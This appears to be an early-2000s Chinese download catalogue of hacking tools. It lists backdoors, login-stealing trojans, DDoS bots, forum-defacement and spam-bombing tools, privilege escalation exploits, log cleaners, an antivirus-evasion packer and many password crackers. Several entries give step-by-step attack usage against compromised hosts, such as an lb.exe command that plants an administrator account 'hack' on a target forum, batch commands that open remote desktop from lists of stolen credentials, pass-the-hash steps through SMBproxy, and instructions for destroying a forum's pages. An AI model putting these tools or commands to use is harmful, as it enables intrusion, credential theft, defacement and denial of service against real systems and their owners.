黑软

    | <]

---

命令行后门类
winshell
WinShell是一个运行在Windows平台上的Telnet服务器软件，主程序是一个仅仅5k左右的可执行文件，可完全独立执行而不依赖于任何系统动态连接库，尽管它体积小小，却功能不凡，支持定制端口、密码保护、多用户登录、NT服务方式、远程文件下载、信息自定义及独特的反DDOS功能等...《入侵NT中winshell的使用》
Gina
Gina木马的主要作用是在系统用户登陆时，将用户登陆的名字，登陆密码等记录到文件中去，因为这个DLL是在登陆时加载，所以不存在象findpass那类程序在用户名字是中文或域名是中文等无法得到用户...儒
Wollf1.5 我们的一位女黑客写的软件，扩展Telnet服务，集成文件传输、Ftp服务器、键盘记录、Sniffer(for win2k only)、端口转发等功能，可反向连接，可通过参数选择随系统启动或作为普通进程启动
WinEggDrop Shell 1.50最终版在 一个扩展型的telnet后门程序{中国最强的后门}
***********************************************************************

***********************
菜鸟扫描软件！
20CN IPC 扫描器正式版
全自动IPC扫描器，可以同步植入木马，可以透过部分没有配置完整的防火墙，能

够探测流光探测不到的一些用户...（中文版）
网络肉鸡猎手
一个快速查找网络肉鸡的小工具
网页信息神探
使得网页不再有秘密，各种信息一目了然，什么电影、图片、Email地址、文章、

Flash、压缩文件、可执行文件...等等的链接地址无处可藏！连续而快速下载各

种软件、打包教程、VB、VC、动画教程、Flash、电影、写真图片

***********************************************************************

***************
溢出工具

封包
包括SQL2.exe SQL蠕虫听过吧，就是的这个漏洞！

NetScanTools 一款功能强大的网络工具包...（英文版）

THCsql

针对David Litchfield发现的MSSQL OpenDataSource函数漏洞的攻击程序，内含 源代码。

小紫V2.0追加版
软件说明：
直接覆盖2.0的xiaozi.exe即可。独立也可使用，只是没了LB.EXE

2003-6-4
小紫V1.0推出，能黑注册信息
2003-6-6
小紫V2.0推出，加入噩梦之吻功能，能黑主页，分类，自定义文件
2003-6-8
小紫V2.0追加版推出 加入LB.EXE，可以获得论坛管理员权限
2003-7-7
小紫V3.0推出 补加可以黑欢迎短讯功能

程序包含文件：
xiaozi.exe
lb.exe
readme.txt

此软件只对LB论坛有效
此软件是20NT浪心原创作品
此软件需要VB6.0运行库的支持
如：我们要黑
http://sundreamer.51.net/cgi-bin/leoboard.cgi
在轰炸目标里写http://sundreamer.51.net/cgi-bin/
在输入你要说的话：注意，在回车的地方输入<br>
OK。点攻击就好了，在点查看黑页看你的成果吧
如果不成功，在确定没写错的情况下，说明对方已经打上这个补丁。
不过现在看来成功率还是很高的：（

噩梦之吻是浪心扩展的一个恶意破坏功能，威力之大，对网站将是致命的打击
使用方法：
首先确定对方是否是绝对路径
判断方法http://sundreamer.51.net/cgi-bin/leoboard.cgi
这样的路径是绝对路径
http://www.no1eastsea.net/jjren/cgi-bin/leoboard.cgi
这样的就不是绝对路径
http://sundreamer.51.net/cgi-bin/leoboard.cgi为例子
我们先要选上绝对路径（前面打钩）
然后选择“黑它分类”
点噩梦之吻。在查看黑页，我们发现，他所有的分类都进不了了
“黑他主页”我就不多说了
我们如果要黑http://sundreamer.51.net/cgi-bin/fight.cgi 这是论坛的比武游 戏
我们点，我要自己定义 在输入文件里选择fight.cgi。在点噩梦之吻。OK：）
要http://www.no1eastsea.net/jjren/cgi-bin/leoboard.cgi
就要把绝对路径前的钩去掉就好：）

小紫追加版功能 比如目标论坛http://www.target.com/lb/cgi-bin/leoboard.cgi
CMD下进入lb.exe所在目录
运行命令 lb.exe -hhttp://www.target.com/ -p 80 -b E:/website/lb/cgi-

bin/ -w /lb/cgi-bin
说明 http://www.target.com/为目标论坛的域名也可是IP 80为端口 E:/website/lb/cgi-bin/ 为论坛说在主机的绝对路径 /lb/cgi-bin为论坛路径 一但成功，自动加入帐号密码都为hack的管理员

 

LB5论坛轰炸机 简介：
LB5论坛轰炸机(修正版)2.0说明:
一、修正了第一版在很多机器不兼容，导致不能使用的问题。现支持各种Windows 类的操作系统；
二、增加了多线程、多用户同时轰炸的功能（同时可以支持4个线程），攻击效率 是第一版的四倍，同时开启4个线程的使用方法为：
1.本软件为免费软件，但首先在天龙论坛内注册用户。连接地址在 http://www.lsky.ne t中找。（注：不注册不能使用）
2.在预炸论坛内先注册4个用户。（如：炸弹1、炸弹2、炸弹3、炸弹4）
3.在程序中输入这4个用户及密码。
4.输入预炸论坛的论题连接地址。（例如:http://***.***.***/cgi-bin/forums.cgi?f orum=2）在4个线程的地址框中可以输入同样的也可以输入不 一样的，作用分别为4线程同时炸一个论题和4个线程分别炸4个不同的论题。
5.分别点击4个确定按钮，此时即可开启4个线程。
（开启1－4个线程的方法同理。）
三、对轰炸的内容已无限制，增加了开始数值的设定，降低了重贴率。

 

MSN 消息攻击机

这是一个用于MSN Messenger 的消息攻击机（其实不局限于MSN 的），它具有超

快的攻击速度，据测试，在普通Pentium 200 MMX 攻击速度可以达到5条/秒。而

且软件体积极小，有效节省系统资源...（DameWare NT Utilities v3.71.0.0 注册版
这是一款功能强大的Windows NT/2000/XP 务器远程控制软件，只要拥有一个远程主机的管理帐号就能使用它远程GUI下登陆交互控制主机...

柳叶擦眼
这个小软件可以列出系统所有的进程（包括隐藏的），并可以杀死进程.这个是共享软件...（中文版）《让传奇木马走开》

Xdebug
Microsoft Windows内核消息处理本地缓冲区存在溢出漏洞
详细请看http://www.chinesehack.org/file/bug/show.asp?id=7440
运行xDebug.exe，成功后会以SYSTEM权限运行ey4s.bat

scanipc
这个是木头见过的最傻瓜化的入侵软件了，只要设置好你要上传的后门和IP范围 ，它就会开始工作了，界面简单实用，全自动IPC扫描器，可以同步植入木马，可 以透过部分没有配置完整的防火墙，能够探测流光探测不到的一些用户 ...

 

 

elsave.exe
榕哥日志清除工具

LC4
可以检测用户是否使用了不安全的密码，是最好，最快的Win NT/2000 workstations 密码破解工具，目前这是最新版本.它宣称：在P300机器上不到48 小时可以破解90%的超级用户(Admin)口令.8%不到10分钟就可以破解出来 ...

独裁者

DDOS
控制大量Server进行DDoS的工具，支持4种攻击方法：SYN、LAND、FakePing、狂怒之Ping，危险程度高，慎用。
程序分为Client和Server，Server在肉鸡上执行后会自动安装为NT服务程序并删除自身，以后将会采用NT Service方式在肉鸡上作为木马运行，可以Telnet/HTTP 控制，方法：直接在IE输入 http://ip:8535 即可。
Server端自动兼容系统环境，在98/Me/2000/XP都能安装，98/Me下能发起狂怒之Ping攻击，2000/XP下能使用所有功能。

WEBDAV通用版

iis5sp3
默认解压为www.kyzj.com或者www.kyzj.net

IECookiesView1.5
可改写cookies信息，有此工具进行cookies欺骗就简单多了，

HackPass.exe
帮你获得UserID和MD5码,破解MD5码软件分两个可执行文件： DVGetPass.exe 是用来得到用户名和密码。 HackPass.exe 用来破解MD5码。 HackPass.exe破解MD5 的速度比较快我作了一个测试： 3600个用户，选暴力破解模式 20分钟 破了1021 个6位数字的。如果挂字典 ，3秒钟破解 所有的密码为000000的用户，：）

 

IPScanner

v1.77 注册版
这是一款强大有力的可以帮助你更好管理计算机和网络的工具，具有Ping、检测 打开的端口、检测Netbios names/User name/MAC (Ethernet) vendor、共享、NT Services、Local Groups、Global Groups、检测远程系统时间等功能。

netsvc.exe 控制远程

NT服务的Ntreskit程序

铁血-Open3389

V1.1
完全用批处理写的远程开启3389服务的工具。不依赖管理共享了。
tx3389.bat [IP] [用户名] [密码]
tx3389.bat [肉鸡文件]
如果指定肉鸡文件批处理将从文件中读取ip 用户名 密码
肉鸡文件的文件格式为ip 用户名 密码。空格隔开。
例1：tx3389 192.168.0.2 user ""
例2：tx3389 file.txt
肉鸡文件格式如下（空格隔开）：
192.168.0.1 user ""
192.168.0.2 administrator 123
192.168.0.24 administrator admin

Server 2003

的3389终端登录器
Server 2003的3389终端登录器，是从Windows Server 2003中提出的

open3389.rar
一个好用的开3389的小程序，比起HBULOT djxyxs ，open3389要好用多了，程序

一运行，电脑马上重起，程序经压缩处理后只有31k，原代码来自红客联盟，本程

序在win2k server ，win2k Advanced Server上测试通过

arpsniffer

榕哥写的arpsniffer交换环境下的嗅探程序已经出到0.5了,这个版本最大的好处

就是内置了路由功能,不再需要更改系统配置实现。

 

debploit

DebPloit Win NT/2000权限提升工具，可以将任意用户提升到SYSTEM级别的权限

。漏洞出在smss.exe中的DEBUG子系统，所有普通用户都可以通过该漏洞获得对系

统中任意进程或线程句柄的控制，从而可以以SYSTEM或管理员权限执行任意命令

。2、使用方法：假设我们已经获得一台机器上的一个GUEST用户（或其他普通用

户），现在我们要这个工具来获得系统最高权限。进行如下步骤：把ERunAsX.exe

和ERunAsX.dll这两个文件复制到目标主机上可访问的目录下，例如C:/下。以

GUEST身份运行"ERunAsX 要执行命令"，例如"ERunAsX cmd.exe"，这时执行的命

令是以SYSTEM 权限运行的...（请注意：具体使用以软件内英文说明为准，内附

该BUG解决办法），执行环境：Windows NT 4.0/2000（SPs在2002/03/12之前）

 

fscan v1.0

一个anti IDS的cgi扫描工具。

FScan112
WinNT的快速端口（TCP、UDP）命令行扫描仪，扫描速度超过每秒200个。

idahack ida溢出

idq.dll
利用isapi漏洞提升权限(对sp0+sp1+sp2都非常有效，也是很棒的web后门)

ispc.exe idq.dll连接客户端

MsSqlHack

MS SqlServer2000, SSNETLIB.DLL!ConnectionPreLogin.sprintf 远程溢出

psexec
psexec是一个类似于TELNET和PCANYWHERE的工具，允许你远程在WINDOW下执行任

意程序，可以不设置客户端直接执行。

reboot.exe

NT下的一个重起程序。

SqlExec
天行软件最新公开推出 MS-SQL Exec for NetHackerIII软件,SQLExec 软件用于

远程MS-SQL服务器上执行MS-DOS命令。SQLExec是标准的Win32 GUI程序，自动修

改系统注册表，设置成TCP/IP连接数据库方式。并可以保存执行结果。

SuperScan

GUI界面的优秀扫描器

SYN潜伏攻击者
为Lion SYN写的扩展GUI界面，实现了隐藏攻击的功能。

wget
极好的命令行断点续传工具，功能极强。
1.8.2Windows版，支持HTTPS和改进的文件名处理方式，避免了在Linux平台下能

正确处理下载文件名而在Windows下出错的问题。

Getadmin

win2k+sp3配置的权限提升程序(不错!!!) *

Fssniffer Client 1.0
程序是在Visual Basic6.0上开发的，所以需要msvbvm60.dll。这个工具是用来连 接Fs Sniffer(不会没听说过吧，是小榕的一个监听器，运行在远程肉鸡上，可以探测到对它的连接的密码)功能确实很棒，但由于密码很多。所以在察看结果的时 候常常会无法记住。而且并没有保存功能。这里并不是说小榕的软件不好哦，只 是小榕可能工作繁忙，加上“流光”开发任务大。可能一时忙不过来。在这里，我们当然还要感谢一下小榕开发的fssniffer。没有fssniffer，也就没有这个 client了。呵呵，废话一大堆，现在来讲一下如何使用吧： 1）界面很简单。你

输入肉鸡的ip和你绑定fssniffer的端口。按下连接。程序则会连接到你的肉鸡了 。 2）然后输入密码，一旦连接上，你就可以用“进入”按钮，进入机器。 3） 如果密码正确，回显框中就会顺利出现fssniffer的欢迎界面。 4）点击显示结果

。会在回显框中显示出密码。当然，这时你可以按下“停止显示”。程序在这个 时候应该不会死机。 5）点击浏览按钮。选择目录。输入文件名。点击确定。 6 ）然后按保存按钮。如果顺利保存。会出现提示的。这样你就可以慢慢的看你监 听到的密码了。平台：WindowsNT/2000

xptsc
WIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁. 格式 IPscreen.width-366)this.width=screen.width-366" border=0>ort

MsSqlHack
MS SqlServer2000, SSNETLIB.DLL!ConnectionPreLogin.sprintf 远程溢出

SQLTools

SQL的扫描探测工具集合，包括：SQLPing,SQLScanner,SQLCracker,SQLDos等。

hgod
HGod V0.51----HUC DoS Tool V0.51
1. 具有SYN/DrDos/UDP/ICMP/IGMP拒绝服务测试功能的选项。
2. 只运行在Win2000/XP以上版本的Windows系统里。
3. 能够用来测试网络安全产品或者常见操作系统的抗拒绝服务性能。
4. 经过测试SYN Flood能够达到每秒50000个连接请求。
5. 杀伤力强大, 一个SYN Flood线程足以让Win2000 IIS连接数占满而无法访问。
6. 使用参数比较多, 自己慢慢摸索, 请不要使用本软件用于破坏行为。

0.51 版功能改进:
1. 增加了ICMP/UDP/IGMP Flood发包时的随机产生数据包大小的选项。
2. 调整了SYN Flood的线程参数及延时控制。

aspcode
针对IIS的ASP溢出漏洞已编译好的两段代码，有什么用，想你应该知道，可以试 试.screen.width-366)this.width=screen.width-366" border=0> 为避免此漏洞和其他已知漏洞,请尽快安装windows2000SP3。

rootkit
运行于Windows下的rootkit，能够隐藏进程、开TCP/IP后门、实现内核级shell，

还具有键盘Sniffer的功能。最可贵的是，它还提供了程序源代码。平台:WinNT/2000

Xscan
一款强大的扫描软件，可以和流光相媲美 采用多线程方式对指定IP地址段（或单 机）进行安全漏洞检测，支持插件功能，提供了图形界面和命令行两种操作方式 ，扫描内容包括：远程操作系统类型及版本，标准端口状态及端口BANNER信息，SNMP信息，CGI漏洞，IIS漏洞，RPC漏洞，SQL-SERVER、FTP-SERVER、SMTP-

SERVER、POP3-SERVER、NT-SERVER弱口令用户，NT服务器NETBIOS信息、注册表信 息等。扫描结果保存在/log/目录中，index_*.htm为扫描结果索引文件。 增SSL 插件，用于检测SSL漏洞；升级PORT、HTTP、IIS插件...（

x-way2.5
采用多线程形式对服务器系统进行漏洞扫描和安全测试工具，X-WAY多个版本均在 Win2000下开发，建议用户使用时候也在Win2000环境，以发挥最佳效果...（中文 版）《扫描工具，别忘了x-way2.5》

下面的软件本来不想收进来给大家看，因为顶级黑客不入侵个人电脑，基本不用 别人写的木马，肯定是人手一个（自己编写的木马）
没有任何杀毒软件能查出来的。
***********************************************************************

***********************

使用木马改造工具：

ASPack
这个是使用木马都一定要会用的工具，它能压缩木马，不让杀毒软件查出来！
 
  

3389.rar 终端服务全套工具内含终端开启（bat/vbe/exe）、终端连接、端口修改等工具

另外MagicKing 说的上面的Xscan_gui太久了..现在放个新的上..不用发EM给我.
Xscan_gui2.30高级扫描器
 
扫描监控
NetXRay
NetXRay是由Cinco Networks公司开发的一个用于高级分组检错器，它具有图形和表格的作用，可提供分组获取和译码的功能，主要特点：1、客户机/服务器结构允许连接到另外机器上的其他拷贝，以实现远程监控。2、Trigger（触发器）可发出基本错误、应用或者任何其它网络特性的状态报警。3、Packet Generator（分组产生器）允许在特定情况下加载网络，你能够测试网络在重负载下的能力，也可以利用分组产生器来发送常规（或者伪造、你可千万别乱来哦）的分组。4、还可以截获以太网桢及其中所含的数据。
Nmap
UNIX下的著名扫描器Nmap的windows版本
Shadow Security Scanner
Shadow Security Scanner 5.37 俄罗斯安全界非常专业的安全漏洞扫描软件，功能极其强大...支持在线升级。
cis-5.0.02
小而使用的扫描器，可以扫描unicode和cgi漏洞。
TWWWSCAN1.2
TWWWSCAN的最新版本1.2（2001.2.19出品）可以扫描400多个www/cgi漏洞。此版本在WIN95 OSR2, WIN98,WIN98SE,Win NT4,Win 2k/Me 下可正常使用

口令破解
黑雨--POP3邮箱密码暴力破解器
一个POP3邮箱破解工具，使用深度算法、广度算法、多线程深度算法等一系列先进的算法达到快速的破解，是个不错的POP3破解器
溯雪
溯雪 Beta 7 英文版 基于WEB的探测器 For Win98/NT/2000
溯雪Beta 7 中文补丁 NetMonkey 汉化
溯雪Beta 7 中文补丁 NetMonkey 汉化（请先按安装英文版，释放到原英文版目录即可）
黑客字典II
中文版 200K Name:Banyet Codescreen.width-366)this.width=screen.width-366" border=0>8G22M
乱刀1.25SE
乱刀1.25SE Unix Password Killer

源程序库
LINUX0.01源代码
LINUX核心0.01版的源代码，这是个有纪念意义的Kernel,当年Linus写的就是这个，最为原始的一个LINUX，建议所有的人都该拉下去看看，不大，只有71KB
MS-DOS6.0完整源代码
Microsoft MS-DOS6.0 完整源代码，包括所有外部命令，安装程序，DOSSHELL等。每个源文件均包括开发历史、更新说明、注释。这样一套源码对你的意义，实在无法以笔墨形容。

其他
NetDemon网页源代码察看器
查看所有禁止查看源码的网站的页面源码，检查网页是否存在恶意代码，防止受到java炸弹等的袭击，如果人家告诉你一个网址，你担心是否有炸弹等陷阱时，你可先用此工具检查其内容，确定没事之后再用IE等浏览器浏览.查看服务器的类型，在文档头的server中显示，由此也可判断服务器的操作系统类型
20CN Mini Ftp 服务器
随着宽带上网的人越来越多，朋友之间的文件共享与交流成了一个问题，用QQ MSN之类的传送吧，很不方便，速度也是一个问题，装个Server-U吧，似乎夸张了点。而且说不定给你弄个漏洞出来，危害到你电脑的安全，这就不好了嘛。而这个20CN MINI FTPD 正好满足你的要求。很小的个头，很绿色。有需要时打开，不需要的时候关闭，当然也可以选择适当的目录，永久性的共享给你的朋友。把用户名和密码告诉你的朋友，他们就可以随时来下载你分享给他们的东西了。
Windows Media服务远程溢出程序
Windows Media服务nsiislog.dll远程溢出程序
ByPassFireWall
这是一个测试突破防火墙得到一个Shell的程序。详细使用方法见Readme.txt
WinEggDropShell V1.38
插入到任意进程中运行的后门程序。 lsass,svchost,smss等进程都能插入。使用前先好好看一下EditServerReadme.txt,如何配置后门以及要注意些什么的事项，都在这个说明文件。详细的命令说明就请看Readme.txt
20CN远程控制软件
本远程控制软件为客户连接的反弹方式，由客户主动连接服务器，通信方式为HTTP隧道，可以控制局域网内部的机器，控制功能包括文件操作，磁盘操作，注册表编辑，屏幕监控，窗口管理，进程管理、服务管理、文件查找等大部分功能远程控制功能，能开启终端服务，关闭、重起机器，能自卸载。文件传输支持断点续传。作者：shesh 最新版本：1.01。 最近功能更新：见Readme文档。最近更新日期：2003-06-08
网卡MAC地址修改程序
可以在NT/2k/xp下修改指定网卡的MAC地址，至于修改MAC地址有什么作为，那视乎自己的需要的，搞那些MAC spoofing或在网络中检测建立的网络的routing table等都会用到的。由于列出系统mac地址的功能使用的api在win9x下不支持，所以程序在win9x下并不支持的。注意：本程序并不能物理性的直接修改网卡ROM中的MAC地址，而是通过修改注册表中的数据来欺骗操作系统。
PortLoggerV1.2
用来监视某一个特定的TCP端口的连接情况，并将连接写入文件的程序。
CleanIISLog
CleanIISLog IIS 日志处理工具，可以不留痕迹地清除指定的IP连接记录。

 
 
现在放上的是"加密解密"的一些软件....当然不可能把现在所有的都放上如果各位还需要哪些"加密解密"请告诉.我会尽力帮你们找的....

加密解密

Cain v2.5 beta38 for NT/2000/XP
Cain v2.5 beta38 for NT/2000/XP
这是一个可以破解屏保、PWL密码、共享密码、缓存口令、远程共享口令、SMB口令、支持VNC口令解码、Cisco Type-7口令解码、Base64口令解码、Access Database口令解码、Cisco PIX Firewall口令解码、Cisco MD5解码、NTLM Session Security口令解码、IKE Aggressive Mode Pre-Shared Keys口令解码等综合工具，还可以远程破解，可以挂字典以及暴力破解，其sniffer功能极其强大，几乎可以明文捕获一切帐号口令，包括FTP、HTTP、IMAP、POP3、SMB、TELNET、VNC、TDS、SMTP、MSKERB5-PREAUTH、MSN、RADIUS-KEYS、RADIUS-USERS、ICQ、IKE Aggressive Mode Pre-Shared Keys authentications等，目前已经提供对Winpcap v3.0支持。

Venom Windows Binary v1.1.5
是一款利用Windows Management Instrumentation (WMI)服务通过字典破解Windows密码的工具。在Server服务已经被禁用的情况下，它依然有效。其破解速度可调，但是大约是在45~50次猜测/秒。密码字典支持%username% 与 lc %username%以及用户名即为密码方式。“lc”前缀是自动转换用户名为小写。

黄金眼1.1
破解“金梅电影”那套程序的管理员名和密码的东东，在google上搜索了下，随便找了两个站，结果都进去了screen.width-366)this.width=screen.width-366" border=0>，因为得到的管理员权限，所以请网友们进去不要搞破坏，有电影看就行了。

无盘克星0.47

xsbClear.zip
小哨兵密码清除工具，我机上没有环境，没法试，不知有没有效。

Serv-UPassCrack v1.0a
本软件通过字典破解serv-u ftp密码输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到正确的密码。 如：
D:/public>cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
Microsoft (R) Windows Script Host Version 5.6
版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。

*******************************************************************************
Serv-UPassCrack v1.0a
Serv-U FTP PassWord Cracker by Caine, Thanks to Djpower
Usage:
cscript crack.vbs ServUPass
/h: this usage.
CAUTION:!!!!Wordlist must in Dict.txt file!!!!
*******************************************************************************

0AD10648F17E9E8D1FF316C1BA75105A=test
Finished!! Goodluck.

Dialupass v2.0
这个程序可以列举出电脑中所有拔号程序的帐号，密码及登录域，在某些场合可能有用。

字典专家.BBSt 5.4.4
一、字典专家.BBS(t) 4 新增功能：
1.支持网址密码与姓名密码输出的功能.

二、使用说明：
1.本软件使用十分简单,首先,输入所需段数,然后点击'刷新(Refresh)'
键,本软件就会根据您输入的段数,打开相应数目的项.第二步,选择输出的
密码档位置和输出方式.最后,点击'生成(Begin)'按钮就可以了.如果要分
割生成的字典档,只需在按下'生成(Begin)'按钮之前,将每个字典档密码数
量改为相应数值即可.
2.前一版本的密码生成器使用:只需选择好保存位置、关键字和输出位
数(不包括前缀和后缀位数),是否需要前缀或后缀,然后点击生成即可.生
成结束后,它会报告所生成的密码总数,并把总数加到刚生成的密码文件最
后面.
注意:如果选择'自定义'输出,在编辑框中输入字符或字符串,然后点击
右边的'Add'按钮,就可以把输入的字符或字符串加入到列表框中.★双击某
一项可将其从列表框中删除.

三、功能列表：
1.生成特殊形式的密码.如:由某几个字符不停变换的密码.
2.提供'观看'功能.当密码档文件生成之后,你可按下此按钮来查看它.
3.利用本软件,你可以编制任意形式的密码(1--16段).
4.前一版本的密码生成器以按钮'其他'的形式提供.

 

RainbowCrack 1.01
一个快速破解NT密码的东西，它的原理不是暴力破解，而是通过查询预先做好的密码与密文一一对应的文件来快速破出密码，优点是速度快，缺点是生成的文件非常大。具体使用请看说明文件。

Tups 1.22
Tups 1.22 [For NT/2000/XP]
一个NT下的全功能工具,对单一主机NT,ftp,pop3账号进行扫描和破解,对SunOS的finger获取用户列表,以及port扫描,单行ftp传输,日志清除，......

Advanced Intuit Password Recovery v1.24
Advanced Intuit Password Recovery v1.24破解版
Advanced Intuit Password Recovery 是一款用来取回丢失或者是以往的密码的工具，支持多种密码格式!支持Quicken (*.QDI, *.QDB, *.QDF),Quicken Lawyer (*.PFL) and QuickBooks(.QBA, .QBW) files.多种文件格式!

pass.rar
破解硬盘还原卡的东东，我机上没有还原卡，没法试，不知有没有效。

Advanced Money Password Recovery v1.11
Advanced Money Password Recovery v1.11 破解版
「AMPR」是专为微软 Money 程序所设计的解密程序，可以帮你找回忘记的密码。如果你手边有以前的档案，却因为密码忘记而无法开启，你不妨来试试「AMPR」的威力。

MONSTER字典V4.0
功能更加强大的字典工具，此版本较之前的版本中增加了字典合并和拆分功能

ntpwkit.rar
NT PW Kit
就是那个可以直接从软盘或光盘引导到一个Linux，然后直接修改windows nt/2000 administrator口令的东东。由于Linux对NTFS文件系统的支持，以及这种方式的危险性，本工具可能会造成系统账号信息丢失，请慎用之，任何人不会对此负责。

Pubwin4 幽灵
Pubwin4 幽灵，支持清除网吧管理软件Pubwin4 的管理密码，当然也支持还原密码，针对会员还可以使用清除计费软件功能。

天龙还原精灵卸载器
天龙还原类软件卸载器
本程序有1.0 FOR 98 和 2.0 FOR NT/XP两个版本
其中,1.0只是将一个备份的MBR写进主引导区,因此,可能有一定的危害,比如如果你安装了第三方的多引导程序,或者你安装了非WIN系统,都会造成危害,因此如果你使用时请仔细考虑,一切后果自负
2.0在1.0的基础上有所改进,程序将自动分析你的系统是否安装还原类软件,如果安装就卸载,并且恢复成你安装还原软件之前的主引导区,如果你的系统没有安装将什么多不做,所以比1.0安全

SAMInside 2.1
暴力破解NT密码（LMHash/NTHash ）的软件，该软件没设字典功能，而是从你选定的字符里组合去破解你得到的LMHash/NTHash，且可以同时对几个LMHash/NTHash进行暴力破解，速度不受影响。
我试了下，用abc123作为密码，字符用abcdefghijklmnopqrstuvwxyz1234567890，结果大概10分钟破出密码，如果机器配置高一点的话那效果应更好。

MD5 for win
for win的MD5暴力解密工具。
由于 MD5 是一种不可逆的编码算法，因此要“还原”出原始密码就只能用穷举法（暴力法）了。本程序使用了公开的 MD5 算法模块，在P4-1.5G的机器上一秒钟可以尝试约20000个号码。另外本程序还带有四个实用的密码字典。

DeMD5 for linux
用C语言写的破译 MD5 的程序：
破解速度可以达到约 100 万次/秒 ，在P4-1G的机器上：
破解 8 位数字的密码最长时间需要 100 秒。
破解 8 位字母的密码最长时间需要 60 小时左右。
本程序在 Linux/FreeBSD 下运行

ADump v1.2
Windows NT/2K Password Dumper
感觉与findpass作用差不多
ADump -d 显示用户名及密码
ADump -f [filename] 把用户名及密码写入指定文件

htm工具
可以加密解密你的htm文件

PasswordViewer V2.01
PasswordViewer 是一个集察看屏保口令、Access数据库口令、CMOS口令、QQ2000口令、美萍网管口令、Win9x共享口令、Win9x缓存口令的软件，他同时附带了支持Win2k的星号探测器。

动网密码全攻略
帮你获得UserID和MD5码,破解MD5码软件分两个可执行文件： DVGetPass.exe 是用来得到用户名和密码。 HackPass.exe 用来破解MD5码。 HackPass.exe破解MD5的速度比较快我作了一个测试： 3600个用户，选暴力破解模式 20分钟 破了1021个6位数字的。如果挂字典 ，3秒钟破解 所有的密码为000000的用户，：）

mysqlfast.zip
一个高速mysql密码暴力破解器，速度很快,但也很占资源。
A high-speed brute-force password cracker for MySQL hashed passwords. It can break an 8-character

password containing any printable ASCII characters in a matter of hours. By Secret Squirrel

uan.zip
本软件是一个可以在局域网发生特效的木马软件,(不含病毒,就算有杀毒软件也是无可奈何)下面是本软件的使用步骤让我们先来打开本软件,然后看的界面就是这样了,然后点一下[扫描],然后稍等片刻就会出现在局域网里所有安装传奇游戏的计算机上的IP了,然后用鼠标点一下那IP就可以确定那个机器了，后面的事情就是怎么往他的机器里加栽木马了，如果对方有防火墙之类的软件，那也不要怕，我们就来点一下按钮[如果对方有防火墙请点击这里]就哦K了。《运行环境windowsXP》本软件是一个可以偷邮箱而且炸邮箱的软件，用法很简单，先添上邮箱的用户名什么的，再选择好字典文件，还有的就是别忘了按那那个开始破解的按钮。下面的是往指定的邮箱发送垃圾信件，这个和上面是一样的都可以用代理的IP先把代理的IP和端口添好，然后再填上你的邮箱地址（可以瞎填，但不可以不填）还有的就是发信主题，最后别忘了按确定发送哦。^_^*
详细请看说明。

Share Password hacker
利用的Win9x共享口令的脆弱缺陷破解密码的程序。
和PQwak相似,只是这个是命令行下的.
例: Hackit.exe 192.168.0.1 xiaoli c 8
以8位密码破解IP地址为192.168.0.1主机名为xiaoli的共享目录c的密码。

激活专家
激活专家--风飘雪作品
现在好多软件在安装时要输入序列号才能继续，
也就是说，你不输入序列号，则《下一步》这个按钮是灰色的。
你无法点他，嘿嘿，有了这玩意，XXX在你的名柄那里输入 下一步， 并点激活，（输入时可能显示乱码，但不理他）哈哈，你将畅通无阻！！！这玩意对付一般的软件，包括瑞星现在出的安装下载版，没有任何问题！也就是这是一个极通用的工具！！！！

还原精灵全版本密码读取工具
本程序为还原精灵密码读取工具，为管理员丢失密码时使用，莫用于非法用途，否则后果自负。本程序不可用于NT内核的操作系统。你可以选择不使用该程序，但使用该程序的一切后果和给你带来的失望，本人不承担任何责任！
提示：如密码中存在不可见字符，可进入命令提示符状态，用输出重定向符" >"将程序的输出结果输出到一文本文件当中，复制文本文件中的password即可。如读取不成功，请重新启动计算机再次运行！

NTscan 1.0 汉化版
NTscan 1.0是一个支持IPC$, SMB, WMI 扫描的NT弱口令猜测工具。

ntxp2k-cracker.zip
一个NT/2k/XP密码暴力破解批处理脚本，先是通过pwdump2.exe把sam文件dump到pass.txt中，再用john.exe进行暴力破解。
可把文件解压到软盘上，在对方机上执行a:/qd，然后抽回盘到自己的机器上，copy到硬盘里再执行crack.bat进行破解。当然这个方法对不能接触对方机器是没有用的

MDcrack 1.2
MD5广泛用于加密和解密技术上，在很多操作系统中，用户的密码是以MD5值（或类似的其它算法）的方式保存的，用户Login的时候，系统是把用户输入的密码计算成MD5值，然后再去和系统中保存的MD5值进行比较，来验证该用户的合法性，此加密法为不可逆的。此软件就是用来解开那段加密码后的MD5值的，支持MD4/MD5/NTLM1,速度不错。

VNCPwDump V0.0.1
VNC是一款远程控制软件,与pcanywhere一样它在网络中使用非常广泛,能运行于Linux,Solaris,Windows9x/2000/NT及Macintosh等系统中,默认端口为5900.这个程序可以获取VNC的连接密码,提供多种获取方式,比如:从NTUSER.DAT文件中获取,从命令行输入获取,注入VNC线程获取等方式.压缩包中含源代码.

SMBproxy V1.0.0
如果拿到一个远程主机NTLMHash密码信息, 一般都会使用暴力破解来获取密码,这个程序可以使用proxy方式与远程主机验证登陆,来达到快速进入的目的.
使用方法:

1. 停掉本机server服务,因为此程序默认使用127.0.0.1的139端口

net stop server

2. 运行本程序

smbproxy -s -f

3. 通过本地代理登陆远程主机

net use * //127.0.0.1/c$ /u:administrator

注意:

程序只认可pwdump格式的密码信息,LC格式不行. 压缩包中提供了转换工具
(username:userID:LM hash:MD4 hashIMG]http://www.netxeyes.org/image/bbs3000/angel_smile.gif[/IMG]IMG]http://www.netxeyes.org/image/bbs3000/regular_smile.gif[/IMG]
admin:1003:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12283678
 

 

NT Crack
pwdump2从系统SAM数据库中获取用户信息，保存为以下格式(username:userID:LM hash:MD4 hash) NT Crack就是利用pwdump2获取到的MD4 passwd hash破解帐号密码， 比较经典的工具。压缩内含pwdump2

MSN Password Recovery v2.00
该程序用于恢复你遗忘的MSN Messenger 口令，它通过从注册表和暴力破解的方法恢复口令，正确率在100%。

特殊密码制作程序
这个程序能做出一个特殊的密码，起到了防盗的作用。很简单，但却很实用。

AIMPR 1.61 零售版
